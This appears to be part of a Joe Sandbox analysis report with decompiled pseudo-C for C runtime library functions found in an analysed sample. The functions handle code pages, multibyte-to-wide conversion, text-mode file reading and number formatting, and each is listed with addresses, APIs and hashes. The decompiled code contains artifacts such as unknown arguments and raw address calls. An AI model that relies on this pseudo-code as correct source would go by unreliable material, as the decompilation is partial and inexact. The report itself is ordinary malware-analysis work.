                                                          			E009BE04E(void* __eax, void* __edx, char _a4, intOrPtr _a8) {
				intOrPtr _t15;
				short* _t30;

				_t30 = _a4;
				if(_t30 != 0 &&  *_t30 != 0) {
					_push("ACP");
					 *((intOrPtr*)(_t30 - 0x18)) =  *((intOrPtr*)(_t30 - 0x18)) + __edx;
					if(__eax != 0) {
						if(E009BDB28(0x59fffffa, ?str?) != 0) {
							return E009BEFC5(0x59fffffa);
						}
						if(E009B9FDB(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
							L10:
							return 0;
						}
						return _a4;
					}
				}
				if(E009B9FDB(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
					goto L10;
				}
				_t15 = _a4;
				if(_t15 == 0) {
					return GetACP();
				}
				return _t15;
			}





                                                          0x009be052
                                                          0x009be057
                                                          0x009be05f
                                                          0x009be063
                                                          0x009be06e
                                                          0x009be07f
                                                          0x00000000
                                                          0x009be0ad
                                                          0x009be09f
                                                          0x009be0d0
                                                          0x00000000
                                                          0x009be0d0
                                                          0x00000000
                                                          0x009be0a1
                                                          0x009be06e
                                                          0x009be0ce
                                                          0x00000000
                                                          0x00000000
                                                          0x009be0d4
                                                          0x009be0d9
                                                          0x009be0dd
                                                          0x009be0dd
                                                          0x009be0a6

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp
                                                          • String ID: ACP$OCP
                                                          • API String ID: 856254489-711371036
                                                          • Opcode ID: 1bd8d42fc78afc2a7e66b8cab0d6eb7bf1db64b1f89264cb01edb1aacc4353b3
                                                          • Instruction ID: 68469801770710b5232a3fc01aca10e9955a910c6a7855087d04a112b364d74a
                                                          • Opcode Fuzzy Hash: 1bd8d42fc78afc2a7e66b8cab0d6eb7bf1db64b1f89264cb01edb1aacc4353b3
                                                          • Instruction Fuzzy Hash: C401D83664921DBAEB24BA68DE42FE6339CDF40375F048815FE08D6181F7B4D94083D6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009BA436 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E009BA436(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				signed int _t35;
				int _t38;
				signed int _t41;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E009B2DB9( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E009BA1C7( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t41 = _v20;
							_t59 = 1;
							_t28 = _t41 + 4; // 0x840ffff8
							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E009AF100();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0xe1c11fe1
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0xe1c11fe1
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0xe1c11fe1
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0xe1c11fe1
						_t18 = _t59 + 4; // 0x840ffff8
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}


















                                                          0x009ba43e
                                                          0x009ba443
                                                          0x009ba45d
                                                          0x00000000
                                                          0x009ba45d
                                                          0x009ba445
                                                          0x009ba44a
                                                          0x00000000
                                                          0x00000000
                                                          0x009ba44f
                                                          0x009ba46c
                                                          0x009ba471
                                                          0x009ba474
                                                          0x009ba47b
                                                          0x009ba49a
                                                          0x009ba4a1
                                                          0x009ba4a3
                                                          0x009ba4e7
                                                          0x009ba4f3
                                                          0x009ba4f6
                                                          0x009ba4fb
                                                          0x009ba4fe
                                                          0x009ba504
                                                          0x009ba506
                                                          0x009ba516
                                                          0x009ba516
                                                          0x009ba51a
                                                          0x009ba51c
                                                          0x009ba51f
                                                          0x009ba51f
                                                          0x009ba51f
                                                          0x009ba51f
                                                          0x00000000
                                                          0x009ba525
                                                          0x009ba508
                                                          0x009ba508
                                                          0x009ba50d
                                                          0x009ba50d
                                                          0x009ba510
                                                          0x00000000
                                                          0x009ba510
                                                          0x009ba4a5
                                                          0x009ba4a8
                                                          0x009ba4ac
                                                          0x009ba4d5
                                                          0x009ba4d5
                                                          0x009ba4d5
                                                          0x009ba4d8
                                                          0x009ba4d8
                                                          0x00000000
                                                          0x00000000
                                                          0x009ba4da
                                                          0x009ba4de
                                                          0x00000000
                                                          0x00000000
                                                          0x009ba4e0
                                                          0x009ba4e0
                                                          0x009ba4e0
                                                          0x00000000
                                                          0x009ba4e0
                                                          0x009ba4ae
                                                          0x009ba4ae
                                                          0x009ba4b1
                                                          0x00000000
                                                          0x00000000
                                                          0x009ba4b5
                                                          0x009ba4bf
                                                          0x009ba4c5
                                                          0x009ba4c8
                                                          0x009ba4ce
                                                          0x009ba4d1
                                                          0x009ba4d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009ba4d3
                                                          0x009ba47d
                                                          0x009ba480
                                                          0x009ba482
                                                          0x009ba487
                                                          0x009ba487
                                                          0x009ba48c
                                                          0x00000000
                                                          0x009ba48c
                                                          0x009ba451
                                                          0x009ba456
                                                          0x009ba45a
                                                          0x009ba45a
                                                          0x00000000

                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009BA46C
                                                          • __isleadbyte_l.LIBCMT ref: 009BA49A
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 009BA4C8
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 009BA4FE
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: ad6b76abea79014822cc53aa1520ab27422f7bd74aba9f43af4f3402a73188c8
                                                          • Instruction ID: 8f52befa4c2e748f79f95a784e2a1c2d106a4ad648a4af1624d9444e3cbe01d4
                                                          • Opcode Fuzzy Hash: ad6b76abea79014822cc53aa1520ab27422f7bd74aba9f43af4f3402a73188c8
                                                          • Instruction Fuzzy Hash: 3131CF30604246AFDB218F65CE48BFA7BAAFF41330F158529F865871A0E7B0D950DB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A46C9 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E009A46C9(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edi) {
				void* _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				void* _t64;
				void* _t65;
				signed int _t66;
				signed int _t68;
				signed int _t74;
				void* _t76;
				void* _t77;
				intOrPtr _t78;
				void* _t79;
				signed int _t80;

				_t64 = __ebx;
				asm("rol byte [eax-0x77], 0x41");
				_t76 = __edi - 1;
				_t74 =  *(_t80 - 0x2bc);
				 *__ecx =  *((intOrPtr*)(_t76 + 4));
				 *((intOrPtr*)(_t76 + 0x70)) =  *((intOrPtr*)(__ecx + 4));
				_t47 =  *((intOrPtr*)(0x9c84f8 + _t74 * 0xc))();
				_t48 =  *((intOrPtr*)(_t80 - 0x2dc));
				_t68 = _t76;
				if(_t47 == 0) {
					if(_t48 != 0x9ce694) {
						asm("lock xadd [eax], ecx");
						if((_t68 | 0xffffffff) == 0) {
							E009B2248( *((intOrPtr*)(__ebx + _t76 + 0x1c)));
							E009B2248( *((intOrPtr*)(__ebx + _t76 + 0x18)));
							E009B2248( *((intOrPtr*)(_t76 + 0xa0 +  *(_t80 - 0x2bc) * 4)));
							 *((intOrPtr*)(__ebx + _t76 + 0x14)) = _t78;
							 *((intOrPtr*)(_t76 + 0xa0 +  *(_t80 - 0x2bc) * 4)) = _t78;
						}
					}
					_t49 =  *((intOrPtr*)(_t80 - 0x2e0));
					 *_t49 = 1;
					 *((intOrPtr*)(_t64 + _t76 + 0x1c)) = _t49;
				} else {
					 *((intOrPtr*)(__ebx + _t76 + 0x14)) = _t48;
					_t66 =  *(_t80 - 0x2bc);
					E009B2248( *((intOrPtr*)(_t76 + 0xa0 + _t66 * 4)));
					 *((intOrPtr*)(_t76 + 0xa0 + _t66 * 4)) =  *((intOrPtr*)(_t80 - 0x2e8));
					E009B2248( *((intOrPtr*)(_t80 - 0x2e0)));
					 *((intOrPtr*)(_t76 + 4)) =  *((intOrPtr*)(_t80 - 0x2e4));
				}
				_pop(_t77);
				_pop(_t79);
				_pop(_t65);
				return E009B1E0D(_t65,  *(_t80 - 4) ^ _t80, _t74, _t77, _t79);
			}
















                                                          0x009a46c9
                                                          0x009b825f
                                                          0x009b8265
                                                          0x009b82b8
                                                          0x009b82be
                                                          0x009b82c3
                                                          0x009b82ea
                                                          0x009b82f2
                                                          0x009b82f8
                                                          0x009b82f9
                                                          0x009b833f
                                                          0x009b8348
                                                          0x009b834c
                                                          0x009b8352
                                                          0x009b835b
                                                          0x009b836d
                                                          0x009b837b
                                                          0x009b837f
                                                          0x009b837f
                                                          0x009b834c
                                                          0x009b8386
                                                          0x009b838c
                                                          0x009b8392
                                                          0x009b82fb
                                                          0x009b82fb
                                                          0x009b82ff
                                                          0x009b830c
                                                          0x009b8317
                                                          0x009b8325
                                                          0x009b8332
                                                          0x009b805a
                                                          0x009b805f
                                                          0x009b8060
                                                          0x009b8063
                                                          0x009b806c

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$StringType___crt_memcmp
                                                          • String ID:
                                                          • API String ID: 1184073126-0
                                                          • Opcode ID: d41675ac05ddc7bc1163e82c46b9af16f65fd599d73b3b4ebe38d66d826a3d90
                                                          • Instruction ID: 98e7d9b28e4212d626c4dff7457ae6ebe5ec8b29fa03140aa2a72fdd2b263a15
                                                          • Opcode Fuzzy Hash: d41675ac05ddc7bc1163e82c46b9af16f65fd599d73b3b4ebe38d66d826a3d90
                                                          • Instruction Fuzzy Hash: DD317E70A0221A9FCB10DF28CA84BE9B7B8FB09314F2045E9E519D7252DB319D92CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009A6233 Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 56%
                                                          			E009A6233(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi) {
				void* _t80;
				signed char _t81;
				char* _t83;
				signed int _t84;
				signed char _t86;
				signed int _t87;
				signed int _t89;
				long _t97;
				signed int _t102;
				char _t103;
				char _t104;
				signed int _t106;
				signed int _t110;
				void* _t111;
				void* _t114;
				void* _t115;
				void* _t116;
				signed int _t119;
				signed int _t120;
				char* _t122;
				void* _t123;
				intOrPtr _t124;
				intOrPtr _t126;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t140;
				char* _t142;
				signed int _t143;
				signed char* _t145;
				int _t146;
				signed int _t147;
				void* _t148;
				void* _t150;
				void* _t163;

				_t143 = __esi;
				_t138 = __edi;
				_t133 = __edx;
				_t123 = __ecx;
				_t119 = __ebx;
				while(1) {
					L13:
					 *((intOrPtr*)(_t148 - 0x74af00bb)) =  *((intOrPtr*)(_t148 - 0x74af00bb)) + _t123;
					asm("pushfd");
					_t119 = _t119 + _t119;
					if(ReadFile(??, ??, ??, ??, ??) != 0 || GetLastError() == 0) {
						goto L15;
					}
					L30:
					_t133 =  *(_t148 - 0xc);
					_t123 = 0xd;
					 *_t143 = _t123;
					_t143 = _t143 + 1;
					L25:
					while(_t138 <  *((intOrPtr*)(_t148 - 0x1c))) {
						_t80 =  *_t138;
						__eflags = _t80 - 0x1a;
						if(_t80 == 0x1a) {
							_t124 =  *((intOrPtr*)(0x9cf230 + _t133 * 4));
							_t81 =  *(_t124 + _t119 + 4);
							__eflags = _t81 & 0x00000040;
							if((_t81 & 0x00000040) != 0) {
								 *_t143 =  *_t138;
								_t143 = _t143 + 1;
								__eflags = _t143;
							} else {
								 *(_t124 + _t119 + 4) = _t81 | 0x00000002;
							}
						} else {
							__eflags = _t80 - _t123;
							if(_t80 == _t123) {
								__eflags = _t138 -  *((intOrPtr*)(_t148 - 0x1c)) - 1;
								if(_t138 >=  *((intOrPtr*)(_t148 - 0x1c)) - 1) {
									_push(0);
									_t138 = _t138 + 1;
									__eflags = _t138;
									_push(_t148 - 0x14);
									_push(1);
									goto L13;
								} else {
									_t3 = _t138 + 1; // 0x9b2b48
									_t110 = _t3;
									__eflags =  *_t110 - 0xa;
									if( *_t110 != 0xa) {
										 *_t143 = _t123;
										_t138 = _t110;
										_t143 = _t143 + 1;
									} else {
										_t111 = 0xa;
										_t138 = _t138 + 2;
										 *_t143 = _t111;
										L29:
										_t143 = _t143 + 1;
									}
								}
							} else {
								 *_t143 = _t80;
								_t143 = _t143 + 1;
								_t138 = _t138 + 1;
							}
							continue;
						}
						L34:
						_t83 =  *(_t148 - 0x10);
						_t140 = _t143 - _t83;
						if( *((char*)(_t148 + 0x13)) != 1 || _t140 == 0) {
							L58:
							_t120 =  *(_t148 - 0x18);
							0x74a7428b();
						} else {
							_t145 = _t143 - 1;
							_t86 =  *_t145;
							if(_t86 < 0) {
								_t87 = _t86 & 0x000000ff;
								_t136 = 1;
								__eflags =  *((char*)(_t87 + 0x9ce408));
								if( *((char*)(_t87 + 0x9ce408)) == 0) {
									_t122 =  *(_t148 - 0x10);
									while(1) {
										__eflags = _t136 - 4;
										if(_t136 > 4) {
											break;
										}
										__eflags = _t145 - _t122;
										if(_t145 >= _t122) {
											_t145 = _t145 - 1;
											_t136 = _t136 + 1;
											_t106 =  *_t145 & 0x000000ff;
											__eflags =  *((char*)(_t106 + 0x9ce408));
											if( *((char*)(_t106 + 0x9ce408)) == 0) {
												continue;
											}
										}
										break;
									}
									_t119 =  *(_t148 - 0x24);
								}
								_t89 =  *((char*)(( *_t145 & 0x000000ff) + 0x9ce408));
								__eflags = _t89;
								if(_t89 != 0) {
									__eflags = _t89 + 1 - _t136;
									if(_t89 + 1 != _t136) {
										_t126 =  *((intOrPtr*)(0x9cf230 +  *(_t148 - 0xc) * 4));
										__eflags =  *(_t126 + _t119 + 4) & 0x00000048;
										if(__eflags == 0) {
											asm("cdq");
											E009B3F56(_t126, __eflags,  *((intOrPtr*)(_t148 + 8)),  ~_t136,  ~_t136, 1);
										} else {
											_t147 =  &(_t145[1]);
											 *((char*)(_t126 + _t119 + 5)) =  *_t145;
											_t102 =  *(_t148 - 0xc);
											__eflags = _t136 - 2;
											if(_t136 >= 2) {
												_t104 =  *_t147;
												_t147 = _t147 + 1;
												__eflags = _t147;
												 *((char*)( *((intOrPtr*)(0x9cf230 + _t102 * 4)) + _t119 + 0x25)) = _t104;
												_t102 =  *(_t148 - 0xc);
											}
											__eflags = _t136 - 3;
											if(_t136 == 3) {
												_t103 =  *_t147;
												_t147 = _t147 + 1;
												__eflags = _t147;
												 *((char*)( *((intOrPtr*)(0x9cf230 + _t102 * 4)) + _t119 + 0x26)) = _t103;
											}
											_t145 = _t147 - _t136;
										}
									} else {
										_t145 =  &(_t145[_t136]);
									}
									goto L55;
								} else {
									 *((intOrPtr*)(E009AF100())) = 0x2a;
									goto L3;
								}
							} else {
								_t145 =  &(_t145[1]);
								L55:
								_t142 =  *(_t148 - 0x10);
								_t146 = _t145 - _t142;
								_t140 = MultiByteToWideChar(0xfde9, 0, _t142, _t146,  *(_t148 + 0xc),  *(_t148 - 0x28) >> 1);
								if(_t140 == 0) {
									_t97 = GetLastError();
									E009AF0DF(_t97);
									L3:
									_t120 = _t119 | 0xffffffff;
									__eflags = _t120;
									_t83 =  *(_t148 - 0x10);
								} else {
									_t163 = _t140 - _t146;
									_t140 = _t140 + _t140;
									 *( *((intOrPtr*)(0x9cf230 +  *(_t148 - 0xc) * 4)) + _t119 + 0x30) = 0 | _t163 != 0x00000000;
									_t83 =  *(_t148 - 0x10);
									goto L58;
								}
							}
						}
						L60:
						if(_t83 !=  *(_t148 + 0xc)) {
							E009B2248(_t83);
						}
						if(_t120 != 0xfffffffe) {
							_t140 = _t120;
						}
						_t84 = _t140;
						return _t84;
					}
					goto L34;
					L15:
					if( *((intOrPtr*)(_t148 - 0x14)) == 0) {
						goto L30;
					} else {
						_t133 =  *(_t148 - 0xc);
						if(( *( *((intOrPtr*)(0x9cf230 + _t133 * 4)) + _t119 + 4) & 0x00000048) == 0) {
							__eflags = _t143 -  *(_t148 - 0x10);
							if(__eflags != 0) {
								L27:
								E009B3F56(_t123, __eflags,  *((intOrPtr*)(_t148 + 8)), 0xffffffff, 0xffffffff, 1);
								_t133 =  *(_t148 - 0xc);
								_t150 = _t150 + 0x10;
								_t114 = 0xa;
								__eflags =  *((intOrPtr*)(_t148 - 1)) - _t114;
								if( *((intOrPtr*)(_t148 - 1)) == _t114) {
									goto L23;
								} else {
									_t123 = 0xd;
									 *_t143 = _t123;
									goto L29;
								}
								goto L60;
							} else {
								_t115 = 0xa;
								__eflags =  *((intOrPtr*)(_t148 - 1)) - _t115;
								if(__eflags != 0) {
									goto L27;
								} else {
									 *_t143 = _t115;
									_t143 = _t143 + 1;
									__eflags = _t143;
									L23:
									_push(0xd);
									goto L24;
								}
							}
						} else {
							_t116 = 0xa;
							_push(0xd);
							if( *((intOrPtr*)(_t148 - 1)) != _t116) {
								 *_t143 = 0xd;
								_t143 = _t143 + 1;
								 *((char*)( *((intOrPtr*)(0x9cf230 + _t133 * 4)) + _t119 + 5)) =  *((intOrPtr*)(_t148 - 1));
							} else {
								 *_t143 = _t116;
								_t143 = _t143 + 1;
							}
							L24:
							_pop(_t123);
						}
					}
					goto L25;
				}
			}






































                                                          0x009a6233
                                                          0x009a6233
                                                          0x009a6233
                                                          0x009a6233
                                                          0x009a6233
                                                          0x009afb6d
                                                          0x009afb6d
                                                          0x009afb6d
                                                          0x009afb77
                                                          0x009afb78
                                                          0x009afb84
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc0c
                                                          0x009afc0c
                                                          0x009afc11
                                                          0x009afc12
                                                          0x009afc14
                                                          0x00000000
                                                          0x009afbdd
                                                          0x009afb2a
                                                          0x009afb2c
                                                          0x009afb2e
                                                          0x009afc17
                                                          0x009afc1e
                                                          0x009afc22
                                                          0x009afc24
                                                          0x009afc30
                                                          0x009afc32
                                                          0x009afc32
                                                          0x009afc26
                                                          0x009afc28
                                                          0x009afc28
                                                          0x009afb34
                                                          0x009afb34
                                                          0x009afb36
                                                          0x009afb45
                                                          0x009afb47
                                                          0x009afb65
                                                          0x009afb6a
                                                          0x009afb6a
                                                          0x009afb6b
                                                          0x009afb6c
                                                          0x00000000
                                                          0x009afb49
                                                          0x009afb49
                                                          0x009afb49
                                                          0x009afb4c
                                                          0x009afb4f
                                                          0x009afb5e
                                                          0x009afb60
                                                          0x009afb62
                                                          0x009afb51
                                                          0x009afb53
                                                          0x009afb54
                                                          0x009afb57
                                                          0x009afc09
                                                          0x009afc09
                                                          0x009afc09
                                                          0x009afb4f
                                                          0x009afb38
                                                          0x009afb38
                                                          0x009afb3a
                                                          0x009afb3b
                                                          0x009afb3b
                                                          0x00000000
                                                          0x009afb36
                                                          0x009afc33
                                                          0x009afc33
                                                          0x009afc38
                                                          0x009afc3e
                                                          0x009afd49
                                                          0x009afd49
                                                          0x009afd4b
                                                          0x009afc4c
                                                          0x009afc4c
                                                          0x009afc4d
                                                          0x009afc51
                                                          0x009afc59
                                                          0x009afc5e
                                                          0x009afc5f
                                                          0x009afc66
                                                          0x009afc68
                                                          0x009afc6b
                                                          0x009afc6b
                                                          0x009afc6e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc70
                                                          0x009afc72
                                                          0x009afc74
                                                          0x009afc75
                                                          0x009afc76
                                                          0x009afc79
                                                          0x009afc80
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc80
                                                          0x00000000
                                                          0x009afc72
                                                          0x009afc82
                                                          0x009afc82
                                                          0x009afc88
                                                          0x009afc8f
                                                          0x009afc91
                                                          0x009afca4
                                                          0x009afca6
                                                          0x009afcaf
                                                          0x009afcb6
                                                          0x009afcbb
                                                          0x009afcfa
                                                          0x009afd00
                                                          0x009afcbd
                                                          0x009afcbf
                                                          0x009afcc0
                                                          0x009afcc4
                                                          0x009afcc7
                                                          0x009afcca
                                                          0x009afcd3
                                                          0x009afcd5
                                                          0x009afcd5
                                                          0x009afcd6
                                                          0x009afcda
                                                          0x009afcda
                                                          0x009afcdd
                                                          0x009afce0
                                                          0x009afce9
                                                          0x009afceb
                                                          0x009afceb
                                                          0x009afcec
                                                          0x009afcec
                                                          0x009afcf0
                                                          0x009afcf0
                                                          0x009afca8
                                                          0x009afca8
                                                          0x009afca8
                                                          0x00000000
                                                          0x009afc93
                                                          0x009afc98
                                                          0x00000000
                                                          0x009afc98
                                                          0x009afc53
                                                          0x009afc53
                                                          0x009afd08
                                                          0x009afd0b
                                                          0x009afd0e
                                                          0x009afd25
                                                          0x009afd29
                                                          0x009afa7c
                                                          0x009afa83
                                                          0x009afa89
                                                          0x009afa89
                                                          0x009afa89
                                                          0x009afa8c
                                                          0x009afd2f
                                                          0x009afd34
                                                          0x009afd39
                                                          0x009afd42
                                                          0x009afd46
                                                          0x00000000
                                                          0x009afd46
                                                          0x009afd29
                                                          0x009afc51
                                                          0x009afd4c
                                                          0x009afd4f
                                                          0x009afd52
                                                          0x009afd57
                                                          0x009afd5b
                                                          0x009afd5d
                                                          0x009afd5d
                                                          0x009afd5f
                                                          0x009affda
                                                          0x009affda
                                                          0x00000000
                                                          0x009afb90
                                                          0x009afb94
                                                          0x00000000
                                                          0x009afb96
                                                          0x009afb96
                                                          0x009afba5
                                                          0x009afbca
                                                          0x009afbcd
                                                          0x009afbe8
                                                          0x009afbf1
                                                          0x009afbf6
                                                          0x009afbf9
                                                          0x009afbfe
                                                          0x009afbff
                                                          0x009afc02
                                                          0x00000000
                                                          0x009afc04
                                                          0x009afc06
                                                          0x009afc07
                                                          0x00000000
                                                          0x009afc07
                                                          0x00000000
                                                          0x009afbcf
                                                          0x009afbd1
                                                          0x009afbd2
                                                          0x009afbd5
                                                          0x00000000
                                                          0x009afbd7
                                                          0x009afbd7
                                                          0x009afbd9
                                                          0x009afbd9
                                                          0x009afbda
                                                          0x009afbda
                                                          0x00000000
                                                          0x009afbda
                                                          0x009afbd5
                                                          0x009afba7
                                                          0x009afba9
                                                          0x009afbaa
                                                          0x009afbaf
                                                          0x009afbb6
                                                          0x009afbb9
                                                          0x009afbc4
                                                          0x009afbb1
                                                          0x009afbb1
                                                          0x009afbb3
                                                          0x009afbb3
                                                          0x009afbdc
                                                          0x009afbdc
                                                          0x009afbdc
                                                          0x009afba5
                                                          0x00000000
                                                          0x009afb94

                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 009AFB7C
                                                          • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,?,?,?,?,009B2B47,?,00000080,00000003), ref: 009AFB86
                                                          • __lseeki64_nolock.LIBCMT ref: 009AFBF1
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,009B2B47,009B2B46,?,?,?,?,?,?,?,?,00000001,00000000), ref: 009AFD1F
                                                          • _free.LIBCMT ref: 009AFD52
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ByteCharErrorFileLastMultiReadWide__lseeki64_nolock_free
                                                          • String ID:
                                                          • API String ID: 1844164652-0
                                                          • Opcode ID: 167563a59dbc7d756b962afadd364715225c2f6188a19923c487cd5d41a89af2
                                                          • Instruction ID: e83d34a6351770bb20fcbe2a14f7493020441cfe0f9b0acd19aea8c2788bf9b3
                                                          • Opcode Fuzzy Hash: 167563a59dbc7d756b962afadd364715225c2f6188a19923c487cd5d41a89af2
                                                          • Instruction Fuzzy Hash: 6F210B35A042059FDB11CFECD864BADB7B9EF46720F244479EC95DB291C73498458BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 009C2241 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E009C2241(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E009C27B0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E009C22E5(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E009C2A64(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E009C2985(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                          0x009c2244
                                                          0x009c224a
                                                          0x009c22bd
                                                          0x00000000
                                                          0x009c2251
                                                          0x009c2251
                                                          0x009c2254
                                                          0x009c226f
                                                          0x009c2272
                                                          0x009c2292
                                                          0x009c22a4
                                                          0x009c2274
                                                          0x009c2274
                                                          0x009c2277
